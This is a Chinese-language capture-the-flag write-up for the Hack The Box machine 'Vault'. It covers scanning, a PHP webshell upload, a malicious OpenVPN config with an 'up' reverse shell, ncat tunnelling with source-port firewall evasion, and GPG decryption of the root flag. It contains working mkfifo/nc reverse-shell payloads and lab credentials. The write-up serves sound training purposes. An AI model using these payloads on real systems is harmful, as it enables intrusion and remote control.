[Meachines] [Medium] Vault OpenVPN RCE+NC代理横向移动+GPG解密
字数 1125 2025-08-29 22:41:38

OpenVPN RCE + NC代理横向移动 + GPG解密攻击链分析

信息收集阶段

初始扫描

  • 目标IP: 10.10.10.109
  • 扫描命令: 
    ip='10.10.10.109'; itf='tun0'; 
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then 
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; 
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); 
  if [ -n "$ports" ]; then 
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; 
    nmap -Pn -sV -sC -p "$ports" "$ip"; 
  else 
    echo -e "\e\31m[!] No open ports found on $ip.\e[0m"; 
  fi; 
else 
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; 
fi

发现服务

  • 开放端口:
    • 22/tcp: OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
      • SSH主机密钥:
        • RSA: 2048 a69d0f7d7375bba8940ab7e3fe1f24f4
        • ECDSA: 256 2c7c34eb3aeb0403ac48285409743d27
        • ED25519: 256 98425fad8722926d72e6666c82c10983
    • 80/tcp: Apache httpd 2.4.18 (Ubuntu)
      • 页面内容: 提到了"Sparklays"

Web应用攻击

目录爆破

feroxbuster -u 'http://10.10.10.109/sparklays' -x php

发现路径: /sparklays/design/changelogo.php

文件上传漏洞利用

上传PHP webshell到changelogo.php:

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f') ?>

使用curl访问上传的webshell:

curl -S http://10.10.10.109/sparklays/design/uploads/1.php5

获取初始凭据

/home/dave/Desktop/发现密码:

password: Dav3therav3123
key>itscominghome

横向移动

SSH动态端口转发

ssh -D 1090 dave@10.10.10.109

内网扫描

time for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done

OpenVPN RCE漏洞利用

发现OpenVPN配置文件存在RCE漏洞,参考:
https://www.bleepingcomputer.com/news/security/downloading-3rd-party-openvpn-configs-may-be-dangerous-heres-why/

恶意OpenVPN配置:

remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 10032 >/tmp/f'"
nobind

获取SSH凭据

发现用户dave的SSH密码:

dav3gerous567

权限提升与横向移动

历史记录分析

cat /home/alex/.bash_history

日志分析

grep -rHa "192.168.5.2" /var/log

端口扫描绕过

nmap 192.168.5.2 -Pn -f
nmap 192.168.5.2 -Pn -f --source-port=4444

NC代理隧道搭建

  1. 使用NC连接目标:
nc 192.168.5.2 987 -p 53
  1. 设置本地监听端口:
SHELL=/bin/sh script -q /dev/null
/usr/bin/ncat -l 1801 --sh-exec "ncat 192.168.5.2 987 -p 53" &
  1. 通过隧道SSH连接:
ssh dave@localhost -p 1801 -t 'bash'

使用密码: dav3gerous567

GPG解密获取root flag

  1. 发现加密的root flag:
cat root.txt.gpg
  1. 使用GPG解密:
gpg -d root.gpg

使用密码: itscominghome

  1. 解密后的root flag:
ca468370b91d1f5906e31093d9bfe819

关键知识点总结

  1. 文件上传漏洞利用:

    • 通过修改文件扩展名(.php5)绕过过滤
    • 使用multipart/form-data上传webshell

  2. OpenVPN RCE:

    • 利用script-security 2配置和up指令执行任意命令
    • 通过反向shell建立连接

  3. NC代理横向移动:

    • 使用ncat建立双向隧道
    • 通过本地端口转发绕过防火墙限制

  4. GPG解密:

    • 需要获取密码短语才能解密文件
    • 密码可能隐藏在系统文件或历史记录中

  5. 权限提升技巧:

    • 分析用户历史记录和日志文件
    • 查找内网其他主机和服务
    • 使用非标准端口和协议绕过检测
OpenVPN RCE + NC代理横向移动 + GPG解密攻击链分析 信息收集阶段 初始扫描 目标IP: 10.10.10.109 扫描命令: 发现服务 开放端口: 22/tcp: OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 SSH主机密钥: RSA: 2048 a69d0f7d7375bba8940ab7e3fe1f24f4 ECDSA: 256 2c7c34eb3aeb0403ac48285409743d27 ED25519: 256 98425fad8722926d72e6666c82c10983 80/tcp: Apache httpd 2.4.18 (Ubuntu) 页面内容: 提到了"Sparklays" Web应用攻击 目录爆破 发现路径: /sparklays/design/changelogo.php 文件上传漏洞利用 上传PHP webshell到 changelogo.php : 使用curl访问上传的webshell: 获取初始凭据 在 /home/dave/Desktop/ 发现密码: 横向移动 SSH动态端口转发 内网扫描 OpenVPN RCE漏洞利用 发现OpenVPN配置文件存在RCE漏洞,参考: https://www.bleepingcomputer.com/news/security/downloading-3rd-party-openvpn-configs-may-be-dangerous-heres-why/ 恶意OpenVPN配置: 获取SSH凭据 发现用户 dave 的SSH密码: 权限提升与横向移动 历史记录分析 日志分析 端口扫描绕过 NC代理隧道搭建 使用NC连接目标: 设置本地监听端口: 通过隧道SSH连接: 使用密码: dav3gerous567 GPG解密获取root flag 发现加密的root flag: 使用GPG解密: 使用密码: itscominghome 解密后的root flag: 关键知识点总结 文件上传漏洞利用 : 通过修改文件扩展名(.php5)绕过过滤 使用multipart/form-data上传webshell OpenVPN RCE : 利用 script-security 2 配置和 up 指令执行任意命令 通过反向shell建立连接 NC代理横向移动 : 使用ncat建立双向隧道 通过本地端口转发绕过防火墙限制 GPG解密 : 需要获取密码短语才能解密文件 密码可能隐藏在系统文件或历史记录中 权限提升技巧 : 分析用户历史记录和日志文件 查找内网其他主机和服务 使用非标准端口和协议绕过检测